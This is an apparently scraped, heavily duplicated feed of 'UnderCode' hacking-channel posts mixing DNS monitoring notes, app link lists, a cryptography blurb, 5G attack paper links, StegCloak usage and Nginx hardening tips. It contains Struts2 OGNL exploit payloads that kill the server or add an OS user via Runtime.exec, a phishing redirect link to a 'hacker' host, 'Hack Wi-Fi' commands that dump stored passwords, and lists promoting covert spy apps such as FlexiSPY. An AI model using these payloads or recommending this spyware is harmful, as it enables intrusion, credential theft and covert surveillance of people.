▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Broadly speaking, the data used for tracking has three related applications:
1) Long-term data receiver
According to use cases, long-term storage such as HDFS can open large-scale analysis to discover "what is normal" in the network and then identify historical trends. It is a simple way to get data to the ELK (Elasticsearch Logstash Kibana) stack to perform search and trend analysis. This method of quickly searching for known IOCs uses an open source stack, while detecting any deviations from normal values.
2) Monitor
The monitor counts various DNS transmissions, such as the number of NXDOMAIN, the number of bytes requested, the number of requests, the number of user requests, or the requested distribution TLD, etc. It is very helpful to understand hourly and daily trends. Monitoring applications such as (Graphite) generate graphs and statistics for different data points and allow us to proactively identify anomalies.
3) Real-time threat tracking
When the data arrives, this user process records and detects threats in real time, and constantly searches for malicious transmission patterns, but it performs anomaly detection. Time series analysis, using link libraries such as Karios, to help track, detect abnormal behavior and all data interruptions or cycles.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Broadly speaking, the data used for tracking has three related applications:
1) Long-term data receiver
According to use cases, long-term storage such as HDFS can open large-scale analysis to discover "what is normal" in the network and then identify historical trends. It is a simple way to get data to the ELK (Elasticsearch Logstash Kibana) stack to perform search and trend analysis. This method of quickly searching for known IOCs uses an open source stack, while detecting any deviations from normal values.
2) Monitor
The monitor counts various DNS transmissions, such as the number of NXDOMAIN, the number of bytes requested, the number of requests, the number of user requests, or the requested distribution TLD, etc. It is very helpful to understand hourly and daily trends. Monitoring applications such as (Graphite) generate graphs and statistics for different data points and allow us to proactively identify anomalies.
3) Real-time threat tracking
When the data arrives, this user process records and detects threats in real time, and constantly searches for malicious transmission patterns, but it performs anomaly detection. Time series analysis, using link libraries such as Karios, to help track, detect abnormal behavior and all data interruptions or cycles.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FREE ANDROID APPS FOR LEARN PROGRAMMING :
https://play.google.com/store/apps/details?id=com.upskew.encode&hl=en
https://getmimo.com/
http://www.programming-hero.com/
https://www.tynker.com/parents/
https://enki.com/enkiapp/
https://programminghub.io/
http://www.easycoder.io/
https://www.khanacademy.org/computing/computer-programming
https://lightbot.com/
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FREE ANDROID APPS FOR LEARN PROGRAMMING :
https://play.google.com/store/apps/details?id=com.upskew.encode&hl=en
https://getmimo.com/
http://www.programming-hero.com/
https://www.tynker.com/parents/
https://enki.com/enkiapp/
https://programminghub.io/
http://www.easycoder.io/
https://www.khanacademy.org/computing/computer-programming
https://lightbot.com/
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Google Play
Encode: Learn to Code - Apps on Google Play
Everyone can learn to code
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Encryption algorithm
1) This project builds an efficient certificateless encryption scheme. Compared with the general example, it transforms the identity-based encryption and signature scheme into a combined certificateless protocol, and uses a certificateless encryption verification mechanism to extend the traditional signature encryption method. Based on the technology of identity authentication, pairing is used to verify the related public key. As long as the amortized cost of this verification is low, the result will be as efficient as basic encryption.
2) It not only maintains the advantages of identity-based public key cryptosystems that do not require the use of public key certificates, but also better solves its inherent key escrow problem. Signcryption combines public key encryption and digital signatures At the same time, the two functions of public key encryption and digital signature can be completed in a reasonable logical step, and the calculation amount and communication cost are lower than the traditional "sign before encryption" mode.
3) Use certificateless signature encryption algorithm based on bilinear pairing to use in wireless sensor network. Construct an efficient certificateless encryption scheme. Compared with the general paradigm, the identity-based encryption and signature scheme is transformed into a combined certificateless protocol, and the certificateless encryption verification mechanism is used to extend the traditional signature encryption method. According to the basic identity-based authentication Technology, pairing is used to verify the related public key. As long as the amortized cost of this verification is low, the result will be as efficient as basic encryption.
4) The PBC encryption algorithm is implanted in wireless sensors with limited memory and processing speed (wireless sensors use 51 cores). The ROM is only 4K and has to deal with the sensor's own information transmission, sensor signal detection and peripherals The state of the device is supervised, so it is extremely challenging to use in wireless sensor networks.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Encryption algorithm
1) This project builds an efficient certificateless encryption scheme. Compared with the general example, it transforms the identity-based encryption and signature scheme into a combined certificateless protocol, and uses a certificateless encryption verification mechanism to extend the traditional signature encryption method. Based on the technology of identity authentication, pairing is used to verify the related public key. As long as the amortized cost of this verification is low, the result will be as efficient as basic encryption.
2) It not only maintains the advantages of identity-based public key cryptosystems that do not require the use of public key certificates, but also better solves its inherent key escrow problem. Signcryption combines public key encryption and digital signatures At the same time, the two functions of public key encryption and digital signature can be completed in a reasonable logical step, and the calculation amount and communication cost are lower than the traditional "sign before encryption" mode.
3) Use certificateless signature encryption algorithm based on bilinear pairing to use in wireless sensor network. Construct an efficient certificateless encryption scheme. Compared with the general paradigm, the identity-based encryption and signature scheme is transformed into a combined certificateless protocol, and the certificateless encryption verification mechanism is used to extend the traditional signature encryption method. According to the basic identity-based authentication Technology, pairing is used to verify the related public key. As long as the amortized cost of this verification is low, the result will be as efficient as basic encryption.
4) The PBC encryption algorithm is implanted in wireless sensors with limited memory and processing speed (wireless sensors use 51 cores). The ROM is only 4K and has to deal with the sensor's own information transmission, sensor signal detection and peripherals The state of the device is supervised, so it is extremely challenging to use in wireless sensor networks.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Hack Wi-Fi via Windows Commands :
YOUR NEED FIRST NETSH - https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts
1) This works because Windows 8 and 10 create a profile for every Wi-Fi network you join. If you tell Windows to forget the network, it will also forget the password, so it won't work. But most people never do that.
2) It is necessary that you enter the Windows command line with administrator rights. To do this, use Cortana to search for "cmd" and Command Prompt will appear in the menu; right click on this entry and select "Run as administrator". A black window opens with white text C: WINDOWS system32>. A flashing cursor will indicate where you are typing. Start with this: netsh wlan
3) As a result, you will get the "User Profiles" section - these are all Wi-Fi networks (for example, WLAN or wireless local area networks) that you have accessed and saved. Select the one you want to get the password for, highlight it and copy it. At the prompt below, enter the following, but replace X with the network name you copied; you only need what is in quotes.
> netsh wlan show profile name = "XXXXXXXX" key = clear
4) For the new data that appears, look in the Security Settings section for the Key Content string. The displayed word is the Wi-Fi password / key.
5) On macOS, open up Spotlight search (Cmd + Space) and type in terminal to get the Mac equivalent of the command line. Enter the following, replacing X with the share name.
> security find-generic-password -wa XXXXX
🦑Reset router :
1) Before hard resetting your router to connect to your wireless network, try logging into the router first. From there, you can easily reset your Wi-Fi password / key if you've forgotten it.
2) This is not possible if you do not know the password for the router. (They are not the same unless you set it up like this). Resetting your router only works if you have access. This access can be via Wi-Fi or a physical connection using an Ethernet cable. This is closer to the topic of not hacking Wi-Fi, but setting up Wi-Fi or reconfiguring Wi-Fi which we wrote about recently.
3) The only difficulty is being in the same room as the router. Almost every router has a built-in reset button. Press it down with a pen or unrolled paper clip, hold it for about 10 seconds, and the router will revert to factory settings.
4) If you have a router that your Internet Service Provider (ISP) installed, check the stickers on the device before resetting - the ISP may have printed the Wi-Fi key on the router as well.
5) Once the router is reset, you need another password (plus username) to access the router itself. Again, you can do this through a PC connected to your router via Ethernet, as the reboot will likely kill any potential Wi-Fi connection. The actual access is usually done using a web browser.
Input url: 192.168.1.1 or 192.168.0.1 usually but some companies are kinky. Try them, it generally works. To find out which PC is connected to the router, open a command prompt and enter "ipconfig" without quotes. Look among gobbledygook for an "IPv4 address" that starts at 192.168. The other two, called octets, will range from 0 to 255. Note the third octet (possibly 1 or 0). The fourth one relates to the computer you use to log into the router.
6) In your browser, enter 192.168.x.1, replacing X with the number found in the ipconfig search. The digit 1 in the last octet should indicate the router - this is the number one device on the network.
7) At this point, the router should ask for a username and password. You can check your manual, but you probably lost it or threw it away. So instead go to RouterPasswords.com, which only exists to: tell users the default username / password on every router ever created.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Hack Wi-Fi via Windows Commands :
YOUR NEED FIRST NETSH - https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts
1) This works because Windows 8 and 10 create a profile for every Wi-Fi network you join. If you tell Windows to forget the network, it will also forget the password, so it won't work. But most people never do that.
2) It is necessary that you enter the Windows command line with administrator rights. To do this, use Cortana to search for "cmd" and Command Prompt will appear in the menu; right click on this entry and select "Run as administrator". A black window opens with white text C: WINDOWS system32>. A flashing cursor will indicate where you are typing. Start with this: netsh wlan
3) As a result, you will get the "User Profiles" section - these are all Wi-Fi networks (for example, WLAN or wireless local area networks) that you have accessed and saved. Select the one you want to get the password for, highlight it and copy it. At the prompt below, enter the following, but replace X with the network name you copied; you only need what is in quotes.
> netsh wlan show profile name = "XXXXXXXX" key = clear
4) For the new data that appears, look in the Security Settings section for the Key Content string. The displayed word is the Wi-Fi password / key.
5) On macOS, open up Spotlight search (Cmd + Space) and type in terminal to get the Mac equivalent of the command line. Enter the following, replacing X with the share name.
> security find-generic-password -wa XXXXX
🦑Reset router :
1) Before hard resetting your router to connect to your wireless network, try logging into the router first. From there, you can easily reset your Wi-Fi password / key if you've forgotten it.
2) This is not possible if you do not know the password for the router. (They are not the same unless you set it up like this). Resetting your router only works if you have access. This access can be via Wi-Fi or a physical connection using an Ethernet cable. This is closer to the topic of not hacking Wi-Fi, but setting up Wi-Fi or reconfiguring Wi-Fi which we wrote about recently.
3) The only difficulty is being in the same room as the router. Almost every router has a built-in reset button. Press it down with a pen or unrolled paper clip, hold it for about 10 seconds, and the router will revert to factory settings.
4) If you have a router that your Internet Service Provider (ISP) installed, check the stickers on the device before resetting - the ISP may have printed the Wi-Fi key on the router as well.
5) Once the router is reset, you need another password (plus username) to access the router itself. Again, you can do this through a PC connected to your router via Ethernet, as the reboot will likely kill any potential Wi-Fi connection. The actual access is usually done using a web browser.
Input url: 192.168.1.1 or 192.168.0.1 usually but some companies are kinky. Try them, it generally works. To find out which PC is connected to the router, open a command prompt and enter "ipconfig" without quotes. Look among gobbledygook for an "IPv4 address" that starts at 192.168. The other two, called octets, will range from 0 to 255. Note the third octet (possibly 1 or 0). The fourth one relates to the computer you use to log into the router.
6) In your browser, enter 192.168.x.1, replacing X with the number found in the ipconfig search. The digit 1 in the last octet should indicate the router - this is the number one device on the network.
7) At this point, the router should ask for a username and password. You can check your manual, but you probably lost it or threw it away. So instead go to RouterPasswords.com, which only exists to: tell users the default username / password on every router ever created.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Docs
Network shell (netsh)
Overview of Network shell (netsh), a command-line utility for displaying or modifying the network configuration of a local or remote Windows computer.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑5G Cellular Attacks :
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
don't copy our tutorials
git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑5G Cellular Attacks :
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
don't copy our tutorials
git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
De Gruyter
Independent academic publisher dedicated to high-caliber scholarship from around the world – since 1749.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Struts2 security vulnerability analysis by undercode :
1) remotely execute script code server
user can construct http:? //Host/struts2-blank/example/X.action action :%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} link, command goes here can be replaced It is the purpose of destroying the path and parameters of the script, such as fdisk -f, etc., so that the system cannot run.
2) Redirection vulnerabilities
users can construct a redirection connection like Taobao, a well-known website, in the form of <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles< /a>, guide the user to click to enter the phishing website, and log in on the interface to obtain the user's password.
3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large-scale corporate websites have all been poisoned, and the operation and maintenance engineers are miserable.
🦑Countermeasures: The
Apache team urgently released the Struts 2.3.15.1 security update version, which can be upgraded to this version to solve the above problems.
Struts2 vulnerability attack methods and solutions
1) Principle
The core of Struts2 is the webwork framework used. When processing the action, the http parameters are processed by calling the underlying getter/setter method. It declares each http parameter as an ONGL (here is ONGL Introduction) statement. When we submit an http parameter:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL converts it to:
//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed through the ParametersInterceptor (parameter filter), calling ValueStack.setValue() with the HTTP parameters provided by the user.
2) In order to prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in the parameter name, but if the Java unicode string is used to represent \u0023, the attacker can bypass the protection and modify the value executed by the Java method:
The code here is destructive, please execute it in a test environment, and it is strictly forbidden to use this method for malicious attacks
//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew% 20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it
looks like this: ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new %20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')( #rt=@java.lang.Runtime@getRuntime()))=1
The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); //Close the program, that is, close the web program
🦑Similar can be executed
java.lang.Runtime.getRuntime().exec("net user username and password/add");//Increase the operating system user, it can be successful if there is permission (replace %20 in the URL Space, %2F replace /)
As long as you have permission, you can execute any DOS command.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Struts2 security vulnerability analysis by undercode :
1) remotely execute script code server
user can construct http:? //Host/struts2-blank/example/X.action action :%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} link, command goes here can be replaced It is the purpose of destroying the path and parameters of the script, such as fdisk -f, etc., so that the system cannot run.
2) Redirection vulnerabilities
users can construct a redirection connection like Taobao, a well-known website, in the form of <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles< /a>, guide the user to click to enter the phishing website, and log in on the interface to obtain the user's password.
3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large-scale corporate websites have all been poisoned, and the operation and maintenance engineers are miserable.
🦑Countermeasures: The
Apache team urgently released the Struts 2.3.15.1 security update version, which can be upgraded to this version to solve the above problems.
Struts2 vulnerability attack methods and solutions
1) Principle
The core of Struts2 is the webwork framework used. When processing the action, the http parameters are processed by calling the underlying getter/setter method. It declares each http parameter as an ONGL (here is ONGL Introduction) statement. When we submit an http parameter:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL converts it to:
//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed through the ParametersInterceptor (parameter filter), calling ValueStack.setValue() with the HTTP parameters provided by the user.
2) In order to prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in the parameter name, but if the Java unicode string is used to represent \u0023, the attacker can bypass the protection and modify the value executed by the Java method:
The code here is destructive, please execute it in a test environment, and it is strictly forbidden to use this method for malicious attacks
//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew% 20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it
looks like this: ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new %20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')( #rt=@java.lang.Runtime@getRuntime()))=1
The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); //Close the program, that is, close the web program
🦑Similar can be executed
java.lang.Runtime.getRuntime().exec("net user username and password/add");//Increase the operating system user, it can be successful if there is permission (replace %20 in the URL Space, %2F replace /)
As long as you have permission, you can execute any DOS command.
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑BEST GPS TRACKING ANDROID APPS 2020 :
https://www.gpswox.com/en/gps-trackers-shop/all/mobile-gps-tracker-3
https://play.google.com/store/apps/details?id=com.fmee.fmeeservf&hl=en
https://apps.apple.com/us/app/followmee-gps-location-tracker/id640133448
https://apps.apple.com/us/app/life360-find-family-friends/id384830320
https://apps.apple.com/us/app/waze-navigation-live-traffic/id323229106
https://play.google.com/store/apps/details?id=com.waze&hl=en
https://play.google.com/store/apps/details?id=com.mapquest.android.ace&hl=en
https://apps.apple.com/us/app/mapquest-gps-navigation-maps/id316126557
https://play.google.com/store/apps/details?id=com.wondershare.famisafe
https://apps.apple.com/app/famisafe-parental-control/id1385417904
https://play.google.com/store/apps/details?id=com.mendhak.gpslogger&hl=en_IN
https://play.google.com/store/apps/details?id=com.alienmanfc6.wheresmyandroid&hl=en_IN
https://play.google.com/store/apps/details?id=com.fsp.android.c&hl=en
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑BEST GPS TRACKING ANDROID APPS 2020 :
https://www.gpswox.com/en/gps-trackers-shop/all/mobile-gps-tracker-3
https://play.google.com/store/apps/details?id=com.fmee.fmeeservf&hl=en
https://apps.apple.com/us/app/followmee-gps-location-tracker/id640133448
https://apps.apple.com/us/app/life360-find-family-friends/id384830320
https://apps.apple.com/us/app/waze-navigation-live-traffic/id323229106
https://play.google.com/store/apps/details?id=com.waze&hl=en
https://play.google.com/store/apps/details?id=com.mapquest.android.ace&hl=en
https://apps.apple.com/us/app/mapquest-gps-navigation-maps/id316126557
https://play.google.com/store/apps/details?id=com.wondershare.famisafe
https://apps.apple.com/app/famisafe-parental-control/id1385417904
https://play.google.com/store/apps/details?id=com.mendhak.gpslogger&hl=en_IN
https://play.google.com/store/apps/details?id=com.alienmanfc6.wheresmyandroid&hl=en_IN
https://play.google.com/store/apps/details?id=com.fsp.android.c&hl=en
don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Gpswox
Free Mobile Trackers App, Cell Phone GPS Tracking
Free mobile phone tracker app is convenient way to track your cell phone online. Mobile phone tracking application can be downloaded for iOS, Apple and Android. Track your family, kids, and employees with GPSWOX tracking app.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Methode for Hide secrets with invisible characters in plain text securely using passwords 🧙🏻♂️⭐️
F E A T U R E S :
1) Protect your invisible secret using passwords and HMAC integrity
2) Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
3) Uses 6 Invisible characters in unicode characters that works everywhere in the web - Tweets, Gmail, WhatsApp, Telegram, Instagram, Facebook, and many more!
4) Maximum Compression to reduce the payload (LZ, Huffman).
Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
5) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
6) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string
Written in pure functional style.
Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1) git clone https://github.com/KuroLabs/stegcloak.git
2) $ npm install -g stegcloak
3) Using npm (to use it locally in your program),
$ npm install stegcloak
Hide
$ stegcloak hide
🦑Options:
hide [options] [secret] [cover]
-fc, --fcover <file> Extract cover text from file
-fs, --fsecret <file> Extract secret text from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-c, --config <file> Config file
-h, --help display help for command
Reveal
$ stegcloak reveal
Options:
reveal [message]
-f, --file <file> Extract message from file
-cp, --clip Copy message directly from clipboard
-o, --output <output> Stream the secret to an output file
-c, --config <file> Config file
-h, --help display help for command
✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Methode for Hide secrets with invisible characters in plain text securely using passwords 🧙🏻♂️⭐️
F E A T U R E S :
1) Protect your invisible secret using passwords and HMAC integrity
2) Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
3) Uses 6 Invisible characters in unicode characters that works everywhere in the web - Tweets, Gmail, WhatsApp, Telegram, Instagram, Facebook, and many more!
4) Maximum Compression to reduce the payload (LZ, Huffman).
Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
5) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
6) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string
Written in pure functional style.
Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1) git clone https://github.com/KuroLabs/stegcloak.git
2) $ npm install -g stegcloak
3) Using npm (to use it locally in your program),
$ npm install stegcloak
Hide
$ stegcloak hide
🦑Options:
hide [options] [secret] [cover]
-fc, --fcover <file> Extract cover text from file
-fs, --fsecret <file> Extract secret text from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-c, --config <file> Config file
-h, --help display help for command
Reveal
$ stegcloak reveal
Options:
reveal [message]
-f, --file <file> Extract message from file
-cp, --clip Copy message directly from clipboard
-o, --output <output> Stream the secret to an output file
-c, --config <file> Config file
-h, --help display help for command
✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - KuroLabs/stegcloak: Hide secrets with invisible characters in plain text securely using passwords 🧙🏻♂️⭐
Hide secrets with invisible characters in plain text securely using passwords 🧙🏻♂️⭐ - GitHub - KuroLabs/stegcloak: Hide secrets with invisible characters in plain text securely using passwords 🧙🏻♂️⭐
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 WORKING SPYING APPS ANDROID LIST 4:
https://www.flexispy.com/en/android-spy-app-flexispy.htm
https://play.google.com/store/apps/details?id=com.google.android.apps.kids.familylink
https://play.google.com/store/apps/details?id=com.google.android.apps.adm
https://play.google.com/store/apps/details?id=net.frju.heimdall
https://play.google.com/store/apps/details?id=com.prey
https://spyera.com/android-spy-app/
https://play.google.com/store/apps/details?id=com.wavemarket.finder.mobile
https://findmymobile.samsung.com/
https://xnspy.com/android-spy.html
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑2020 WORKING SPYING APPS ANDROID LIST 4:
https://www.flexispy.com/en/android-spy-app-flexispy.htm
https://play.google.com/store/apps/details?id=com.google.android.apps.kids.familylink
https://play.google.com/store/apps/details?id=com.google.android.apps.adm
https://play.google.com/store/apps/details?id=net.frju.heimdall
https://play.google.com/store/apps/details?id=com.prey
https://spyera.com/android-spy-app/
https://play.google.com/store/apps/details?id=com.wavemarket.finder.mobile
https://findmymobile.samsung.com/
https://xnspy.com/android-spy.html
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Flexispy
Android Spy App - Android Monitoring Software - FlexiSPY™
The only Android spy app that captures all forms of messaging, records and intercepts all types of calls, is 100% hidden, logs keystrokes and much more. With over 150 features it is the most powerful monitoring software for Android.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑🌐Some Nginx security configuration tips by undercode:
1) Basic security setup
The best way to protect your web server is to provide the attacker with a minimum of data: version number of Nginx, PHP, OS, etc.
Typically, information is hidden in HTTP headers.
# Only return Nginx in server header
server_tokens off ;
Testing
# Display title
curl https://mywebserver.domain.net/ -ksv 2> & 1> / dev / null | grep Server
2) Strict Transport Security (HSTS)
This setting allows you to declare to the HTTP client that your web server allows HTTP.
The HSTS policy protects users from eavesdropping attacks.
A man-in-the-middle attack cannot intercept the request while the HSTS is active.
add_header Strict-Transport-Security "max-age = 15552001; includeSubdomains; preload";
3) Other means of protection
# Server passes inodes through blocked ETag
etag off;
more_clear_headers 'ETag';
🦑 Anti-clickjacking :
add_header X-Frame-Options "SAMEORIGIN";
1) SSL and TLS encryption protocols
When we talk about SSL, it is actually SSL / TLS.
You should be aware that SSL has been deprecated since 1999 and its latest version, SSLv3, dates from 1996.
Since then, TLS has come into play and three versions have been released: TLSv1.0, TLSv1.1, and TLSv1.2.
Google claims that as of October 14, 2014, it can decrypt messages using SSLv3 through the POODLE attack.
